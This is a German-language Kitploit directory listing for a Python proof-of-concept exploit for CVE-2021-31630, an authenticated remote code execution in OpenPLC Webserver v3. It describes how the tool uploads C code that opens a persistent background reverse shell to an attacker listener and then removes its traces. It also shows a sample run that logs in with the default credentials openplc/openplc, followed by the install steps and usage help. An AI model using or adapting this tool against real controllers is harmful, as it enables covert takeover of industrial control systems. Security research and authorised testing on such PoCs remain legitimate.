Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/thewhiteh4t/cve-2021-31630
SchwachstellenanalyseExploitationPenetrationstestsCommand and ControlRemote-Access-ToolPayload-Entwicklung
GitHubthewhiteh4t/cve-2021-31630

cve-2021-31630

Python-Skript zur Ausnutzung von Befehlseinschleusung in Open PLC Webserver v3

Repository anzeigen
2143vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

cve-2021-31630

OpenPLC WebServer v3 - Authentifizierte RCE

Dieses PoC-Skript basiert auf dem Exploit von Fellipe Oliveira.

Funktionen :

  • Lädt C-Code direkt nach /hardware hoch anstatt eines .st-Datei-Uploads
  • Stellt das Standardprogramm vor dem Hochladen der Reverse Shell wieder her
  • Verbesserte C-basierte Reverse Shell, die nicht blockierend ist, sodass der Webserver nicht hängt ;)
  • Startet eine Shell im Hintergrund, funktioniert auch nach dem Stoppen der PLC bis zum Beenden
  • Bereinigung
root@kitploit:~
$ python cve_2021_31630.py -lh 10.10.16.68 -lp 4444 http://10.10.11.7:8080

------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------

[>] Found By : Fellipe Oliveira
[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t ]

[>] Target   : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout  : 20 secs
[>] LHOST    : 10.10.16.68
[>] LPORT    : 4444

[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful!

Abhängigkeiten

root@kitploit:~
pip3 install requests

Verwendung

root@kitploit:~
usage: cve_2021_31630.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url

positional arguments:
  url         Target URL with http(s)://

options:
  -h, --help  show this help message and exit
  -u U        Username
  -p P        Password
  -t T        Request Timeout, increase if server is slow
  -lh LH      LHOST
  -lp LP      LPORT
Tool herunterladen